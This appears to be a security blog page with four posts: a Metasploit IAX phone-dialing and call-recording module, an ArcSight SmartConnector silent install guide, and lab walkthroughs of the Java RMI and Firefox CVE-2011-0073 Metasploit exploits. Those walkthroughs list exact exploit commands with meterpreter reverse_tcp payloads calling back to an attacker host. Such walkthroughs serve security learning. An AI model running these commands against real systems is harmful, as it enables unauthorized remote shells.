Metasploit IAX Telephone Line Voice Scanner Auxiliary module

0
1 year ago
in

HD Moore Rapid7 CSO and create of Metasploit has release a new auxiliary module. This module named “Telephone Line Voice Scanner” will permit you to dials a range of phone numbers and record audio from each answered call. This module is only supporting IAX VOIP communication. IAX is most of time used by VOIP provider how are running the open source PBX Asterisk.

You can use this module by charging “auxiliary/scanner/voice/recorder“.

The module has the following options :

  • CALL_TIME : The maximum time in seconds to spent on each call (ring + recording). By default the value is 52 seconds.
  • IAX_CID_NAME : Your caller ID name, optional by default. But some IAX provider require this entry.
  • IAX_CID_NUMBER : Your caller ID number. Could be a phone number or your login depending your provider.
  • IAX_HOST : Your IAX HOST registration server.
  • IAX_USER : Your registration user name (most of the time the same as for SIP).
  • IAX_PASS : Your registration password (most of the time the same as for SIP).
  • OUTPUT_PATH : A local directory to store the resulting audio files.
  • TARGETS : A telephone number, or a list of telephone numbers separated by commas. The phone numbers shouldn’t contain spaces.
Once the module options configured, you can run it. As you can see in the following screenshot, the saved file has as name the phone number with a “.raw” extension.

Also, when you can see when the called phone is ringing and when someone or something has answered.

To read the “.raw” file you will need to convert this file in “.wav” or “.mp3” format. Under Mac OS X I have use Switch Sound File Converter.

ArcSight SmartConnectors silent mass installation

0
1 year ago
in ,

With your free ArcSight L750MB Logger you can mass install ArcSight SmartConnectors with a silent properties configuration file. If you have to install, for example, 10 or more Syslog SmartConnectors, you will win time by reading this blog post.

First of all you need to create a properties configuration file template by installing a typical SmartConnector, with typical settings. Just start to install, for example, a Windows Syslog SmartConnector as described in my previous “Syslog SmartConnector and Snare installation“.

During the installation process, if you see the following screen just click on the “Cancel” button.

Open a command prompt and go to the SmartConnector installation directory (ex : C:\Program Files\ArcSightSmartConnectors) and execute the following command.

The “recorderui” start option will allow you to record the installation process in order to create a mass installation properties configuration file.

The installation wizard will propose you to select a “Silent Properties File Name” and a typical “Installation Target Folder“.

Create an “installer.properties” file on your desk and select it in the wizard. Also select a default installation folder, for example “D:\ArcSightSmartConnectors“. Now you can continue your typical SmartConnector configuration.

You can examine your “installer.properties” to adapt the properties with your needs.

For each SmartConnector you have to install you need to adapt into your “installer.properties” file :

- The SmartConnector name : AgentDetailsPanel.agentname
- The optional SmartConnector location : AgentDetailsPanel.agentlocation
- The optional device location : AgentDetailsPanel.devicelocation
- The optional comment : AgentDetailsPanel.comment

Now you can install all your SmartConnectors in silent mode. If a properties file named either “installer.properties” reside in the same directory as the installer, it will automatically be used, overriding all other command line options, unless the “-f” option is used to point to another valid properties file.

The “-f” option can be used by following command line.

Java RMI Server Insecure Default Configuration Java Code Execution

0
1 year ago
in ,

Timeline :

Vulnerability discovered by mihi
Metasploit exploit released the 2011-07-15

PoC provided by :

mihi

Reference(s) :

Oracle Java RMI documentation

Affected version(s) :

All JSE versions

Tested on Windows XP SP3 with :

JSE 7 (build 1.7.0-b147)

Description :

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

Commands :

On windows target box :

cd C:\Program Files\Java\jre7\bin
start rmiregistry.exe

On Metasploit box :

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.178.48
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability

0
1 year ago
in ,

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported to vendor by ZDI the 2011-02-02
Coordinated public release of advisory the 2011-05-09
Metasploit exploit released the 2011-07-10

PoC provided by :

regenrecht
xero

Reference(s) :

CVE-2011-0073
OSVDB-72087
ZDI-11-157
MFSA2011-13

Affected version(s) :

Firefox 3.6.16 and bellow
Firefox 3.5.18 and bellow
Seamonkey 2.0.13 and bellow

Tested on Windows XP SP3 with :

Firefox 3.6.9

Description :

This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x and 3.5.x found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it’s possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn’t employ any ASLR-free modules anymore.

Commands :

use exploit/windows/browser/mozilla_nstreerange
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

Go to Top